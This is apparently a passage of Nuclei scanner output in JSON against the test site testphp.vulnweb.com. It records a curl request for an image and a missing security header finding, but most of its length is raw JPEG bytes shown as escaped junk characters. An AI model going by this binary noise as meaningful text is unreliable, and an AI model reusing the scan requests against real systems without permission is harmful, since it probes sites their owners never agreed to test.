\ufffd\\ufffd\\u001c\\ufffd\\ufffd+\\ufffd\\ufffd*N\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd?an\\ufffdW\\u0013lx\\ufffd\\ufffd/\\ufffd\\ufffd\\u0017\\ufffd\\ufffd\\ufffdt\\ufffdwD4N\\ufffd\\ufffdI\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\u001d\\ufffd@? v\\ufffd\\ufffd\\ufffdr9\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdו\\ufffd\\ufffd\\ufffd7%\\ufffd9\\ufffd\\ufffd5N\\ufffd=?\\ufffdס\\ufffd\\ufffd~Ne\\ufffd\\ufffd\\u001eX\\ufffd)Wȅ)J\\u0000R\\ufffd\\ufffd\\u0005)J\\u0000\\ufffd\\ufffd^ɧjVװ\\ufffd2[Ȳ\\ufffde\\u000c\\t\\u00078 \\ufffd\\u0008\\ufffd\\u0011\\ufffd\\ufffd۾\\ufffd\\ufffdP\\ufffdM\\ufffdFb\\ufffdH\\ufffd\\ufffd\\u000b\\ufffd\\\\+/\\u0003\\ufffd\\u000e\\t\\ufffd\\u0013\\ufffd\\ufffd\\ufffdj\\ufffdtް\\ufffd,\\ufffd\\ufffdk\\u0015t{kv-\\u0018 \\ufffd\\\\\\ufffd\\u0006\\ufffd\\u0012H\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\u0004un2\\ufffd\\ufffd\\ufffdznu\\ufffd\\ufffd}#]\\u000f:\\ufffd\\ufffd=9a\\ufffd~ď\\ufffd\\u001a\\ufffd\\ufffdj\\ufffdV\\ufffd\\ufffd\\ufffdʪ\\u00103\\ufffd\\ufffd\\u0006I\\u001e\\ufffd\\ufffd{r\\u0007\\u0015\\ufffd4\\u001dXKio{lΚh\\ufffd\\ufffd)%\\u001e\\ufffd\\u0018\\ufffd\\ufffd\\u001d\\ufffd\\u001c\\u0015\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\u001da\\u0016\\ufffdu\\u0004s\\ufffdC\\u0018\\u000b$C'w\\ufffd\\u0004\\ufffd\\ufffdn\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014]\\ufffd\\ufffdG,\\ufffdu7_ZOc\\u0006\\ufffd\\u0010H\\ufffdl\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd s\\ufffd\\ufffd\\u001fp\\u0006@'\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdK4\\u0010\\ufffd{\\u0015IJ@]\\ufffd\\u0016\\u0000m\\ny\\ufffd8\\u0018\\ufffd\\ufffd\\ufffd\\u001a\\ufffdɼ\\ufffd.n\\ufffd\\ufffd3J\\ufffd\\u0015\\ufffd\\ufffdI\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd#\\ufffdԸ\\ufffdり\\ufffdY\\ufffdz\\ufffd\\u000b\\ufffd\\ufffd\\ufffd}F\\ufffd\\u0012\\u001a7\\ufffd\\ufffdubC\\ufffd\\ufffd\\ufffd\\ufffdx8\\ufffd\\ufffd8\\ufffdZ.\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u001fO\\ufffdI\\u000c\\ufffd\\ufffdF\\ufffd\\ufffd \\ufffd#\\ufffd\\u0013\\ufffdV\\ufffdU\\ufffd\\u0008\\ufffd\\ufffdcn\\u0008\\ufffd\\ufffd\\ufffdrX\\ufffd\\ufffde\\ufffd\\ufffd|\\ufffd=\\ufffd\\ufffdA\\ufffd(PB\\ufffd\\ufffdm\\\\\\u001eG\\n\\ufffd\\ufffd\\ufffd'\\u0000V\\ufffd\\ufffd\\rA\\ufffdMf\\ufffd\\ufffd\\ufffdw\\ufffd!*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffdQU\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\u0007J\\ufffdK\\ufffdJR\\ufffd\\u0018)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000)JP\\u0006ᖳq\\ufffd\\ufffd]?%\\ufffd\\ry\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd\\u0008\\ufffd;f\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\ufffdۉ\\ufffd\\n\\ufffdY\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdX\\ufffdQ\\ufffdN\\u0000\\ufffd$\\ufffd\\ufffdiJ\\ufffd\\u0018\\ufffds\\ufffd\\ufffdHߤ\\ufffdҔ\\ufffd$b\\ufffd\\ufffd\\u0000)JP\\u0002\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:36.116357821Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"path\":\"/pictures/7.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/7.jpg.tn\",\"request\":\"GET /pictures/7.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6458\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:21 GMT\\r\\nEtag: \\\"4dca64a1-193a\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0004\\u0005\\u0007\\u0003\\u0001\\u0008\\ufffd\\ufffd\\u00006\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0002\\u0004\\u0005\\u0002\\u0007\\u0000\\u0003\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0011\\u0000\\u0012!\\u0006\\u00131\\\"A\\u00072Qa\\u0014\\u0015#q\\ufffdB\\ufffd3CR\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0003\\u0000\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0006\\u0001\\u0003\\u0007\\u0000\\u0002\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0004\\u0003\\u0008\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0005\\u0011!1\\u0012\\u0013AQaq\\ufffd\\u0006\\u0014\\\"2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015B\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdI\\ufffdKMc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdܡ\\ufffdy!\\ufffd2\\ufffd\\ufffdw\\u0005c\\ufffdϓϑ\\ufffd\\u0019\\ufffd|x\\ufffd\\u001bT]K=$4n\\ufffd2\\ufffd\\u0014ʌb\\ufffd\\ufffd\\u000c\\ufffd\\u0018,1φ\\ufffdG\\ufffdQz~\\ufffd\\ufffd=t\\ufffdW\\ufffd\\u0002\\u001aF*\\ufffdO0uw\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffdq\\ufffd7\\u003c6nI\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0012)]%?\\ufffd\\ufffd@\\ufffd\\u000ez\\ufffdq\\ufffd\\ufffd\\ufffd\\u0014\\u0003\\ufffds\\ufffdj~\\ufffd\\ufffdE \\ufffd\\ufffd\\ufffd\\ufffdμ\\ufffd\\ufffd\\u0017\\ufffdRׄ\\ufffdH\\ufffd7Y_$\\ufffd5\\ufffd\\ufffdT\\ufffd\\ufffd\\u0018Bʤ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\u001d\\ufffd\\u0026\\ufffd#R\\ufffd\\ufffd\\ufffdO\\ufffdd\\u003e\\ufffd\\ufffd y\\ufffd\\u001c\\ufffd\\ufffd\\u0007VR\\u001c\\ufffd\\u0001u\\ufffdv\\ufffd4*Q\\ufffd\\u0018\\ufffd\\ufffd \\ufffd\\ufffd\\ufffdަ\\u0003\\n\\u0014\\ufffd;\\ufffd\\ufffd\\ufffd\\u000c\\ufffdppt5\\\\\\ufffd\\ufffda\\ufffdl\\u0006\\ufffd\\ufffd:\\ufffdL\\ufffd\\ufffd\\u00059\\u0007$\\ufffd5ǧ\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdvb`\\ufffdJ\\ufffdd\\ufffd\\u000f\\ufffd\\ufffdjNﶃ:B\\ufffdu\\ufffd)\\ufffd2\\u001fS;\\ufffd\\u0014\\ufffd\\\"\\ufffdİ\\ufffd\\u0007r\\ufffd\\u0004\\u0000K1\\u0003h\\ufffd\\u0003:.W\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd;\\ufffdw\\nCI9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\tϝ3w\\ufffdH\\ufffd\\ufffdD\\ufffdp\\ufffdf\\ufffdy\\ufffd\\u000b\\rp\\ufffd\\ufffd\\ufffd\\u00171\\ufffd~\\u000e7x϶uWCw\\ufffdD\\ufffd\\u000b\\ufffd\\u0012E@\\ufffd\\u000e\\ufffd\\u0018\\u0012FAR}\\ufffd\\ufffd\\ufffd\\u000f\\u0007\\u0004\\u00105:V\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdѐ7W\\u000c\\ufffd\\ufffd\\u0017n04\\ufffd o}r\\ufffdN\\u003e\\ufffd\\ufffd+\\rb\\ufffd':\\ufffd6Ll\\u0011\\ufffd\\ufffd8lx\\ufffdBt\\ufffd\\ufffd\\ufffdc+[\\ufffd\\ufffd\\ufffd\\ufffd\\u000fIt\\ufffdj\\ufffdY!\\ufffd\\ufffd!\\ufffd^\\ufffdqʑ\\ufffd,{\\ufffd疉q\\ufffd_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\u0014\\ufffd\\ufffdG$P\\ufffd\\ufffd\\n\\u000eԳ\\ufffd\\ufffd\\r\\ufffdR\\ufffd\\ufffd\\ufffd\\ufffd\\u003cg\\u001cx\\ufffd]\\ufffdH\\ufffd\\u001dT\\ufffdJ\\ufffdVشQ\\ufffd\\ufffdl\\ufffddd\\ufffd\\u0003$g*\\u0008\\u0004\\ufffd\\u0000\\ufffd:\\ufffdr\\ufffd\\u001bg\\ufffdM$\\ufffd\\u0004h\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdKm\\u0018\\u0000珮F\\ufffdE\\u001bc\\ufffd\\ufffd\\ufffd\\ufffd\\u0018\\ufffd󟲧\\ufffdϚ\\ufffd\\u001b \\ufffdS\\ufffd\\u0000v\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\u0012\\ufffd\\u0008c}\\ufffdPHq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdKQ\\u001cK\\ufffdWD\\\\\\ufffd\\ufffd8\\ufffd\\ufffd\\u000f\\ufffdӬ\\ufffd\\ufffdR\\ufffd\\ufffdi\\ufffd#U+:Y\\ufffdJJ\\ufffd\\ufffd\\ufffd2B\\ufffd\\ufffd\\u000cW \\ufffd\\ufffdA\\ufffd\\u0000q\\ufffd\\u0019\\ufffd\\u0000Ρy\\ufffdi\\ufffd\\ufffd;^\\u0013\\ufffd4\\ufffd8\\u001f}}a|\\u0012\\ufffd\\\\Zu\\ufffd\\ufffd\\ufffd\\u0015\\u001eP\\ufffd\\ufffd\\ufffd±\\ufffd\\u0004\\ufffd\\u0006\\ufffd//_\\u000c\\ufffdOC\\ufffd\\ufffd\\u0014KP\\ufffdXa/\\ufffdj\\ufffd!F\\u0007k8;\\ufffd@%x$`\\ufffdRx\\ufffd_U\\n\\ufffd\\ufffdb\\ufffd\\ufffdI\\u0005E\\u001c\\ufffd\\ufffd%1\\ufffd8\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd\\u0007:Ww\\ufffd\\ufffdL\\ufffd\\ufffdrF\\ufffdP{;8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd\\ufffd\\\\::\\ufffdb\\u00163G\\ufffdB\\ufffd!;Ӎ\\ufffd\\u001caW\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\u000fa\\ufffd$\\ufffd`s\\ufffd\\ufffd\\ufffd+䦪Ji\\ufffd\\u0018\\u0012Aߌ+.\\u001d_\\ufffd\\ufffd\\u0005P\\ufffd\\ufffd]X\\u0001\\ufffd\\ufffd\\u00006\\ufffdZ\\ufffd8\\ufffd\\u001eK\\ufffd\\u0018D\\u0019c\\ufffd\\u0018\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffd[o4O\\u0015nk[\\ufffd\\ufffd\\ufffd\\ufffd}ƚ\\ufffd}\\ufffd7u\\ufffdĴ3H\\ufffd\\ufffdM\\ufffd7q\\u0026\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffd\\ufffdN\\u0007\\ufffd\\ufffdp\\ufffdա\\ufffdw\\ufffdq\\ufffd\\ufffd\\ufffd~\\ufffd\\u0001\\ufffd~\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffdE\\ufffd锳\\ufffd|\\ufffd\\ufffdLnp\\ufffd\\\\3$\\u000e\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffd;\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd(b\\ufffdG\\ufffd8c\\ufffd\\u0001vg,Ac\\ufffd\\u0013$\\ufffd\\u0005\\ufffd\\u0000J^\\ufffd^=\\ufffd\\ufffd\\ufffd\\ufffdϝ\\nu+\\ufffdQG:\\u0019B\\u000c\\u001c\\ufffd#\\ufffd\\ufffd΄\\ufffd`q\\u0012\\ufffd\\ufffdM\\ufffd\\u0013[[\\ufffdC\\ufffdx\\ufffd]\\ufffd\\ufffd\\u00158\\ufffd4F:s\\u0013\\\"\\ufffd\\ufffd\\ufffdRRT\\ufffdy \\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdR\\ufffd3\\ufffd\\ufffd\\u0002\\ufffd\\ufffdܮ}\\u0011=ʎ\\u0016\\ufffd\\ufffd\\ufffd(bhi`H\\ufffd\\u0000\\u0011\\u0000\\u0005\\\";\\u0011F\\ufffdI\\ufffd\\n\\ufffd?0b\\ufffd\\ufffd:z\\ufffd=L\\ufffd4ҁ\\ufffd\\u0008\\ufffd\\u0001G\\u0007\\ufffd\\u0000}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0000\\ufffd\\u001c`t\\ufffd?\\ufffd8\\ufffdX\\u001bN\\ufffd$/\\ufffd[Vt\\ufffd\\u003c\\u001c\\ufffd\\ufffd\\ufffdimS\\ufffd@er\\ufffdC\\u000c\\u0011\\ufffd\\u000cu\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffdv\\ufffdC\\ufffd8\\ufffd \\ufffd8\\ufffd \\ufffd\\ufffdD\\ufffd\\ufffduC\\ufffdZ\\ufffdH\\ufffds\\t\\ufffd\\ufffdϾ|\\u0018\\ufffd\\u003eO\\ufffd\\u0008\\u001e\\ufffd\\ufffd\\ufffd \\ufffd\\ufffd\\u0016\\ufffd\\u001d\\u001c\\ufffd!\\ufffd\\u003e(*\\ufffdVl\\ufffdPϲX\\ufffdgqHӘ\\ufffd]\\ufffd\\ufffd\\t\\u000c\\ufffd\\ufffd6L\\u001cn8q.\\u0015A\\u0018!\\ufffd\\ufffd\\ufffd\\u00005\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\u0016\\u0013\\u0006\\u0014\\ufffd9`\\ufffd\\u0005\\u0008;9\\u0007$\\ufffd\\u0003\\ufffdhJ\\ufffd\\ufffdӳ\\ufffdI\\ufffdu=]\\u0015X\\u0002\\ufffd\\u000c\\ufffd\\u000b\\ufffd'\\ufffdT\\ufffd_\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\u0001l\\ufffd\\ufffd̴\\u00157\\u001b|\\ufffd!\\ufffdId\\ufffd\\u0015-\\u0018\\ufffd\\ufffdw+6_\\ufffd\\u000b\\u0000\\ufffd\\ufffd\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffdjJ:\\ufffd\\ufffdr\\ufffd,\\u000c\\ufffd\\ufffd\\ufffdL\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd5\\u0015%W\\r\\ufffd\\u0013\\ufffd\\ufffdp5$\\ufffd\\u0016\\ufffdiHऎ\\u0018c\\u0011\\\"q\\ufffd\\u000c\\u0000s\\ufffd\\u0000~\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd(\\n1\\ufffd\\ufffd7\\u001c}\\ufffd\\ufffd\\u0000mH\\ufffdީ\\ufffd\\u000f\\ufffd2f\\ufffdi=\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffd2F\\ufffd\\u000c$esɩ\\ufffdyt\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdw\\u001d7\\ufffd\\ufffd\\u0003g\\ufffd\\ufffd':ނ\\ufffdLs\\ufffdUq\\t#`@ \\ufffd}KsƸK\\ufffd5\\ufffdj\\u0016\\ufffd\\ufffdi\\ufffd@\\ufffd].\\u0004sȒƵ\\u0012\\u000c\\ufffd\\ufffd\\ufffd퐟\\ufffdp\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffd\\ufffdd\\u0012\\u0015\\ufffd\\ufffd*\\ufffdt\\ufffdU\\ufffdLf\\ufffda\\u0006A\\u0002\\u0017S\\u001b\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c0q\\ufffd\\u0005\\u0000\\ufffdu\\ufffd\\ufffd\\ufffd_P6ᐰ#\\ufffd\\n\\ufffd\\ufffd\\u0011\\ufffd\\u0008\\ufffd\\ufffd\\u0013[)\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdKOz\\ufffd\\ufffdr\\ufffd\\ufffd\\u0006p\\ufffd$\\ufffd\\ufffd\\ufffdr\\ufffd\\ufffd[y\\ufffd\\ufffdM;\\u001ao\\ufffd4\\ufffd\\ufffd\\ufffd!f, /\\ufffdع^\\u0010\\ufffd`\\ufffd\\u0005\\u0001ƢuM/P\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd1H\\ufffd\\ufffd\\ufffde\\ufffd5\\ufffd\\ufffd\\u0026с\\ufffd(]\\ufffd\\ufffd!G\\u0003R:\\ufffd\\u0014J\\t\\ufffd\\ufffd4\\ufffd\\ufffde\\ufffdy\\ufffd\\ufffd\\ufffd%\\ufffd\\u000e\\ufffd\\ufffd\\ufffd|g\\u0019\\ufffd\\u0001$\\ufffd~f\\ufffd=Uj\\ufffdu\\u0015\\ufffdJj\\ufffd\\ufffdAQG:\\ufffd-c\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd#\\ufffd\\ufffdˑ\\ufffd\\ufffd\\ufffd\\ufffd~r0s\\ufffd\\ufffd˷n\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffds1\\ufffd\\ufffd\\ufffdGIw\\ufffd\\u0012CW\\u0004\\ufffd\\ufffd\\ufffdv\\ufffds\\ufffdG\\u001c\\u00022\\u000e\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsQQ\\u000c\\ufffd\\ufffd\\u001dE-\\u003c2\\\"\\ufffd\\ufffd\\ufffd \\ufffdeV\\ufffd\\ufffdq\\ufffd\\ufffd9\\ufffd\\ufffdr\\u0018\\u0000\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdXk\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\u0014J\\ufffdu\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\n2\\ufffd\\u001d\\ufffd\\ufffd2.\\u0014r@\\u003cx\\ufffdk=MT߄\\u0012,P\\ufffd\\ufffd,-Q\\u001a\\ufffdr\\ufffd\\ufffd=L1\\ufffdp`s\\ufffd\\ufffd\\ufffdx\\ufffd=\\ufffdhk\\ufffd#9#ӧ\\ufffd\\n\\ufffdC\\ufffd'\\ufffdf\\ufffd\\u003e\\ufffdh\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd^mv\\ufffd\\ufffdK\\ufffd]R\\ufffd5=\\ufffd\\ufffd;\\u003e%œ\\ufffd8\\u001bO,7z\\ufffdg蹵%ud\\ufffd2=\\ufffdR:\\ufffdw\\ufffdD\\u0011\\ufffd\\u0013\\ufffd\\u0017n\\ufffd\\ufffd\\ufffd\\u00047\\u003c\\ufffd\\u000c\\ufffd\\u001b\\ufffdAƑ\\ufffd\\ufffdAq\\ufffd|=\\ufffd\\ufffd\\ufffd-p\\\\j\\u0016\\u0026\\ufffdU\\u0003d\\ufffd\\ufffd\\ufffd\\ufffdX\\ufffd0US\\u0019l`\\u0005*\\ufffd\\ufffdg\\u0015\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0014HY\\ufffd\\u0000\\ufffd\\ufffd9\\ufffd\\u000f\\ufffd\\ufffdog\\ufffdk\\ufffd6\\ufffd\\ufffd8;\\ufffd\\ufffd\\u0026\\ufffdVq\\ufffd#ܕ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffdT\\ufffd9q\\u0018\\nN\\ufffdp\\u0007\\ufffdQ\\ufffd\\ufffd-\\u0018\\ufffd\\ufffd\\u001aeK\\ufffdB\\u000f \\ufffd\\ufffd\\ufffd\\ufffd\\u0017d.*Ȱ\\ufffdU=\\ufffd\\ufffdM|\\ufffd\\ufffd\\ufffdi\\ufffdA\\u0026\\ufffd0ʮ\\ufffd\\ufffdA\\r\\ufffdO\\u003ex\\ufffd\\ufffd\\u000f \\ufffdr\\ufffd^\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffdi]c\\ufffd!M嘜\\u0001\\ufffd;\\ufffd \\u0000\\u0001\\ufffd\\u003c\\ufffd3_QJ\\ufffdj\\ufffd\\u0008\\u0012/y\\ufffdĀ(p\\ufffd,\\ufffdW\\u000cW!q\\ufffd\\u0004z\\ufffd\\ufffdȠ\\ufffd\\ufffde\\ufffd\\u0011\\ufffd_Qr\\ufffd\\ufffdĂ\\u001bz%E\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGc\\ufffdS\\u0012\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd)\\ufffd\\\"\\ufffd{\\twq\\ufffd\\ufffd\\ufffd㺴\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̍ÇM5\\ufffd׺\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffdm\\ufffd\\ufffd\\u0019dd\\ufffd\\ufffdd\\ufffd\\ufffd!]\\ufffd\\ufffd)\\ufffd\\ufffd%G\\u0000d\\ufffd\\u0017h݃\\ufffd\\ufffdwr\\ufffd\\ufffd\\ufffd{b\\ufffdjƪ\\tQOH#\\u0005\\ufffdy\\ufffd1\\ufffd\\ufffd\\ufffd7\\ufffdp\\u0014\\ufffd\\ufffd\\u0017\\u000crqik\\ufffdK=m\\u003c\\ufffdco\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd\\u0015\\ufffd\\ufffdͶH\\\"pCD\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd@*FA\\u0019:\\ufffdq\\ufffd\\ufffd\\u001c\\ufffd\\ufffdQx\\ufffd?\\ufffd\\ufffdJcV\\ufffd\\ufffd\\ufffd~\\ufffd\\u0026U\\ufffd\\u0018\\ufffd\\u001e\\ufffdަ%@!\\ufffd\\u0018k\\ufffd\\ufffd\\ufffdTD̐5\\u001d\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffd(\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffd\\u001b}\\ufffd.VO̩%\\ufffd\\u0013\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\u0008+\\ufffdFőNH\\ufffd\\ufffd\\u001c0\\ufffd:9\\ufffd\\ufffdCGM\\u001c\\u0014\\ufffdG\\u0014(X\\ufffd\\\"\\ufffd\\u0001\\u003eO\\ufffdp\\ufffd\\u003ep\\ufffd\\ufffd4\\u0003C%e\\ufffd\\ufffd=\\u0015E\\ufffd\\ufffdFD\\ufffd1\\ufffd\\ufffdң\\u0010\\ufffd\\ufffdXn\\ufffdY\\u0018\\u0016![,U\\ufffd쓫UCMM\\u001b\\ufffdm\\u0013\\u0011\\ufffd\\ufffd\\ufffd\\ufffdŞA;\\u0004\\ufffd\\ufffdq\\ufffd\\ufffd(\\u001fh\\ufffdt\\u000e\\ufffdG\\ufffd\\ufffdt\\ufffd\\ufffd\\n\\ufffd\\u001b?\\ufffd\\ufffd\\ufffd\\ufffd \\ufffd~\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdeH\\u0016\\u0015!\\ufffd\\u001c\\ufffdrc\\ufffd\\ufffd\\\"eo\\ufffd\\ufffd\\ufffd׌\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c!)\\u000eO\\ufffd\\ufffd\\u001b\\ufffdttQ\\ufffd\\ufffdp\\u000cq\\ufffd#2\\ufffdԜ\\u0003\\ufffd\\u0007?\\ufffd\\ufffd[\\ufffd\\ufffd\\u0000\\ufffd5]Z\\ufffdDp\\ufffd\\ufffd6KHi\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd 